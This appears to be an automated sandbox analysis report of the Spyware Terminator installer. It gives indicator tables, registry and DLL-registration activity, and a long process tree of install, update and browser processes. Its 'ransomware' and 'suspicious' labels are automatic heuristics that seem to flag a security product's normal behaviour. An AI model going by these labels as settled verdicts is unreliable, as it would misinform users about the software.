5052	SpywareTerminatorUpdate.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
5052	SpywareTerminatorUpdate.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
5052	SpywareTerminatorUpdate.exe
692	SpywareTerminatorShield.exe
692	SpywareTerminatorShield.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe
5084	msedge.exe

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
5040	SpywareTerminator.exe
5040	SpywareTerminator.exe
4172	msedge.exe
4884	msedge.exe
5056	SpywareTerminator.exe
5056	SpywareTerminator.exe
760	SpywareTerminator.exe
760	SpywareTerminator.exe
3824	analyzefile.exe
2344	iexplore.exe
1524	dxdiag.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4204 wrote to memory of 2340	4204	SpywareTerminatorSetup.exe	84
PID 4204 wrote to memory of 2340	4204	SpywareTerminatorSetup.exe	84
PID 4204 wrote to memory of 2340	4204	SpywareTerminatorSetup.exe	84
PID 2340 wrote to memory of 2620	2340	SpywareTerminatorSetup.tmp	102
PID 2340 wrote to memory of 2620	2340	SpywareTerminatorSetup.tmp	102
PID 2340 wrote to memory of 2620	2340	SpywareTerminatorSetup.tmp	102
PID 2340 wrote to memory of 4112	2340	SpywareTerminatorSetup.tmp	103
PID 2340 wrote to memory of 4112	2340	SpywareTerminatorSetup.tmp	103
PID 2340 wrote to memory of 3768	2340	SpywareTerminatorSetup.tmp	104
PID 2340 wrote to memory of 3768	2340	SpywareTerminatorSetup.tmp	104
PID 2340 wrote to memory of 3768	2340	SpywareTerminatorSetup.tmp	104
PID 812 wrote to memory of 3088	812	st_rsser64.exe	107
PID 812 wrote to memory of 3088	812	st_rsser64.exe	107
PID 3768 wrote to memory of 4404	3768	SpywareTerminator.exe	109
PID 3768 wrote to memory of 4404	3768	SpywareTerminator.exe	109
PID 3768 wrote to memory of 4404	3768	SpywareTerminator.exe	109
PID 3768 wrote to memory of 1952	3768	SpywareTerminator.exe	110
PID 3768 wrote to memory of 1952	3768	SpywareTerminator.exe	110
PID 3768 wrote to memory of 1952	3768	SpywareTerminator.exe	110
PID 1952 wrote to memory of 3648	1952	regsvr32.exe	111
PID 1952 wrote to memory of 3648	1952	regsvr32.exe	111
PID 3768 wrote to memory of 760	3768	SpywareTerminator.exe	112
PID 3768 wrote to memory of 760	3768	SpywareTerminator.exe	112
PID 3768 wrote to memory of 760	3768	SpywareTerminator.exe	112
PID 3768 wrote to memory of 3288	3768	SpywareTerminator.exe	113
PID 3768 wrote to memory of 3288	3768	SpywareTerminator.exe	113
PID 3768 wrote to memory of 3288	3768	SpywareTerminator.exe	113
PID 3288 wrote to memory of 2344	3288	regsvr32.exe	114
PID 3288 wrote to memory of 2344	3288	regsvr32.exe	114
PID 3768 wrote to memory of 4884	3768	SpywareTerminator.exe	115
PID 3768 wrote to memory of 4884	3768	SpywareTerminator.exe	115
PID 3768 wrote to memory of 4884	3768	SpywareTerminator.exe	115
PID 2340 wrote to memory of 4676	2340	SpywareTerminatorSetup.tmp	122
PID 2340 wrote to memory of 4676	2340	SpywareTerminatorSetup.tmp	122
PID 2340 wrote to memory of 4676	2340	SpywareTerminatorSetup.tmp	122
PID 4676 wrote to memory of 5052	4676	SpywareTerminator.exe	123
PID 4676 wrote to memory of 5052	4676	SpywareTerminator.exe	123
PID 4676 wrote to memory of 5052	4676	SpywareTerminator.exe	123
PID 4676 wrote to memory of 692	4676	SpywareTerminator.exe	125
PID 4676 wrote to memory of 692	4676	SpywareTerminator.exe	125
PID 4676 wrote to memory of 692	4676	SpywareTerminator.exe	125
PID 692 wrote to memory of 1736	692	SpywareTerminatorShield.exe	126
PID 692 wrote to memory of 1736	692	SpywareTerminatorShield.exe	126
PID 692 wrote to memory of 1736	692	SpywareTerminatorShield.exe	126
PID 2340 wrote to memory of 5040	2340	SpywareTerminatorSetup.tmp	127
PID 2340 wrote to memory of 5040	2340	SpywareTerminatorSetup.tmp	127
PID 2340 wrote to memory of 5040	2340	SpywareTerminatorSetup.tmp	127
PID 5040 wrote to memory of 4884	5040	SpywareTerminator.exe	129
PID 5040 wrote to memory of 4884	5040	SpywareTerminator.exe	129
PID 4884 wrote to memory of 4516	4884	msedge.exe	130
PID 4884 wrote to memory of 4516	4884	msedge.exe	130
PID 4884 wrote to memory of 5068	4884	msedge.exe	131
PID 4884 wrote to memory of 5068	4884	msedge.exe	131
PID 4884 wrote to memory of 5068	4884	msedge.exe	131
PID 4884 wrote to memory of 5068	4884	msedge.exe	131
PID 4884 wrote to memory of 5068	4884	msedge.exe	131
PID 4884 wrote to memory of 5068	4884	msedge.exe	131
PID 4884 wrote to memory of 5068	4884	msedge.exe	131
PID 4884 wrote to memory of 5068	4884	msedge.exe	131
PID 4884 wrote to memory of 5068	4884	msedge.exe	131
PID 4884 wrote to memory of 5068	4884	msedge.exe	131
PID 4884 wrote to memory of 5068	4884	msedge.exe	131
PID 4884 wrote to memory of 5068	4884	msedge.exe	131
PID 4884 wrote to memory of 5068	4884	msedge.exe	131

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\SpywareTerminatorSetup.exe
"C:\Users\Admin\AppData\Local\Temp\SpywareTerminatorSetup.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4204
- C:\Users\Admin\AppData\Local\Temp\is-69TN6.tmp\SpywareTerminatorSetup.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-69TN6.tmp\SpywareTerminatorSetup.tmp" /SL5="$60180,8420808,160256,C:\Users\Admin\AppData\Local\Temp\SpywareTerminatorSetup.exe"
  2⤵
  - Checks computer location settings
  - Drops file in Program Files directory
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2340
- - C:\Windows\SysWOW64\regsvr32.exe
    "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\Spyware Terminator\STShell.dll"
    3⤵
    - Loads dropped DLL
    - Modifies system executable filetype association
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    PID:2620
- - C:\Windows\system32\regsvr32.exe
    "C:\Windows\system32\regsvr32.exe" /s "C:\Program Files (x86)\Spyware Terminator\STShell64.dll"
    3⤵
    - Loads dropped DLL
    - Modifies system executable filetype association
    - Modifies registry class
    PID:4112
- - C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
    "C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe" /INSTALL
    3⤵
    - Adds Run key to start application
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:3768
  - - C:\Windows\SysWOW64\regsvr32.exe
      "C:\Windows\SysWOW64\regsvr32.exe" /s "C:\Program Files (x86)\Spyware Terminator\STShell.dll"
      4⤵
      Loads dropped DLL
      Modifies system executable filetype association
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:4404
  - - C:\Windows\SysWOW64\regsvr32.exe
      "C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Spyware Terminator\STShell64.dll"
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1952
    - - C:\Windows\system32\regsvr32.exe
        
        /s "C:\Program Files (x86)\Spyware Terminator\STShell64.dll"
        5⤵
        Loads dropped DLL
        Modifies system executable filetype association
        Modifies registry class
        
        PID:3648
  - - C:\Windows\SysWOW64\regsvr32.exe
      "C:\Windows\SysWOW64\regsvr32.exe" /s "C:\Program Files (x86)\Spyware Terminator\STInternetGuard.dll"
      4⤵
      Installs/modifies Browser Helper Object
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Modifies registry class
      PID:760
  - - C:\Windows\SysWOW64\regsvr32.exe
      "C:\Windows\System32\regsvr32.exe" /s "C:\Program Files (x86)\Spyware Terminator\STInternetGuard64.dll"
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3288
    - - C:\Windows\system32\regsvr32.exe
        
        /s "C:\Program Files (x86)\Spyware Terminator\STInternetGuard64.dll"
        5⤵
        Installs/modifies Browser Helper Object
        Loads dropped DLL
        Modifies Internet Explorer settings
        Modifies registry class
        
        PID:2344
  - - C:\Program Files (x86)\Spyware Terminator\STInternetGuard.exe
      "C:\Program Files (x86)\Spyware Terminator\STInternetGuard.exe" /install
      4⤵
      Drops file in Program Files directory
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4884
- - C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
    "C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe" /postinstall
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4676
  - - C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe
      "C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe" /INSTALL
      4⤵
      Drops file in Program Files directory
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:5052
  - - C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorShield.exe
      "C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorShield.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:692
    - - C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe
        
        "C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe" /CHECKNOW
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1736
    - - C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe
        
        "C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe" /CHECKNOW
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5100
    - - C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe
        
        "C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe" /CHECKNOW
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4484
    - - C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe
        
        "C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe" /CHECKNOW
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4184
- - C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
    "C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:5040
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.spywareterminator.com/purchase.aspx?cfg=8&lng=en&subid=W10&dinst=0&b=ST_APP_Motivation
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4884
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab0c646f8,0x7ffab0c64708,0x7ffab0c64718
        5⤵
        
        PID:4516
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
        5⤵
        
        PID:5068
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3376
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:8
        5⤵
        
        PID:4420
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
        5⤵
        
        PID:4300
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
        5⤵
        
        PID:4840
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
        5⤵
        
        PID:4848
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4512
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
        5⤵
        
        PID:2244
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
        5⤵
        
        PID:1776
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
        5⤵
        
        PID:1492
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
        5⤵
        
        PID:1400
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
        5⤵
        
        PID:3556
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
        5⤵
        
        PID:2484
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
        5⤵
        
        PID:3512
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2952 /prefetch:1
        5⤵
        
        PID:4744
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2692 /prefetch:1
        5⤵
        
        PID:1576
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
        5⤵
        
        PID:2408
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4880 /prefetch:2
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:344
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:1
        5⤵
        
        PID:4620
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3404 /prefetch:8
        5⤵
        
        PID:1184
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 /prefetch:8
        5⤵
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4172
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,6413093754796654245,4181959868266490700,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2268 /prefetch:1
        5⤵
        
        PID:2752

C:\Program Files (x86)\Spyware Terminator\st_rsser64.exe
"C:\Program Files (x86)\Spyware Terminator\st_rsser64.exe"
1⤵
- Drops file in Program Files directory
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:812
- C:\Windows\system32\RUNDLL32.EXE
  "C:\Windows\system32\RUNDLL32.EXE" SETUPAPI.DLL,InstallHinfSection DefaultInstall 128 C:\PROGRA~2\SPYWAR~1\Driver\stflt.inf
  2⤵
  - Drops file in Drivers directory
  PID:3088

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3188

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4580

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1612

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\e519f5d68c924471852628982de743f6 /t 3192 /p 5040
1⤵
PID:3780

C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
"C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5056

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\d5a742c81d284feda097b04498e76c9d /t 1636 /p 5056
1⤵
PID:1740

C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
"C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"
1⤵
- Adds Run key to start application
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:760
- C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe
  "C:\Program Files (x86)\Spyware Terminator\SpywareTerminatorUpdate.exe" /CHECKBYUSER
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4880
- C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
  "C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe" /FULLSCAN
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4116

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\87132cf9c735419d8a9ff5f92d38b777 /t 4616 /p 760
1⤵
PID:4604

C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe
"C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"
1⤵
- Adds Run key to start application
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pcrx.com/purchase.aspx?st=8&lng=en
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of SendNotifyMessage
  PID:5084
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab0c646f8,0x7ffab0c64708,0x7ffab0c64718
    3⤵
    PID:2524
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2264,10469530977205901978,1400793979011051205,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2276 /prefetch:2
    3⤵
    PID:4988
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2264,10469530977205901978,1400793979011051205,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2460 /prefetch:3
    3⤵
    PID:4804
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2264,10469530977205901978,1400793979011051205,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:8
    3⤵
    PID:60
